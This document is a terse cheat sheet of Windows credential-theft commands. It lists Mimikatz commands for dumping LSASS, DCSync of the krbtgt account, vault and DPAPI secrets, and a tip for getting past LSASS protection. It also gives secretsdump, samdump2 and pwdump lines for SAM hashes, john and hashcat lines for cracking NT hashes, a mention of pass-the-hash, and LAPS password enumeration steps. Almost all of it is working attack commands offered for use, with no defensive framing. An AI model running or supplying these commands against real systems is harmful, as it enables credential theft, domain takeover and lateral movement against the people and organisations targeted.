privilege::debug
token::elevate
lsadump::lsa /inject /name:<user> //NTLM hash of user
lsadump::dcsync /user:krbtgt //Hashes of specified user
sekurlsa::logonpasswords //NTLM and SHA1 hashes
sekurlsa::credman //vault credentials
sekurlsa::ekeys /aes128
sekurlsa::ekeys /aes256
vault::cred //vault credentials
vault::list //credman plaintext passwords
if the logonpassword command returns an error Handle on memory (0x00000005) download the library from (Win32) or (Win64) in the same folder as the mimikaz executable and use the following commands in Mimikatz to disable LSASS protection
It is possible to retrieve and dump keys from old backup versions of the system saved with ShadowCopy. Once the backup version is exposed you can dump the SAM credentials and extract DPAPI hashes. All the following operations require Admin privileges
secretsdump.py -sam <sam file> -system <system file> LOCAL
secretsdump.py -sam <sam file> -system <system file> -security <sec file> LOCAL
Samdump or Pwdump
samdump2 system.save sam.save
pwdump SYSTEM SAM > <file>
After obtaining the hashes they can be cracked to obtain the passwords or used in Pass the Hash attacks. In order to obtain the passwords we need only the NT part of the hash. given an hash with the following structure AAAA:BBBB the actual string to bruteforce is the one to the right of the column
john -format=NT -wordlist=<wordlist> <hashfile>
hashcat -m 1000 -a 0 --force --show --username <hash> <wordlist> #rows follow the format <user>:<hash>
Enumerate Credentials hashes. The parameter guidMasterKey reveals the hash of the master key
dpapi::cred /in:"<path to cred hash>"
Retrieve the master key, decode it and store the key in cache. In order to decrypt the key we need to be operating under the same context (user, system) the key belongs to.
dpapi::masterkey /in:"<Path to MasterKeyGUID>"
dpapi::masterkey /in:"<Path to MasterKeyGUID>" /rpc
dpapi::cache
Decrypt other hashes with the master key
dpapi::cred /in:"<path to CredHash>"
LAPS
Verify that LAPS is installed by searching for admpwd.dll usually in C:\Program Files\LAPS\CSE
Check available commands in PowerShell
Get-Command *AdmPwd*
Find groups allowed to interact with LAPS. If command run with a wildcard argument throws an exception after returning one or more values call the command again but this time specify as identity parameter one of the OUs obtained the first time
Run the following command in the context of a user part of the group allowed to interact with LAPS to dump the stored passwords. The target is the machine with LAPS enabled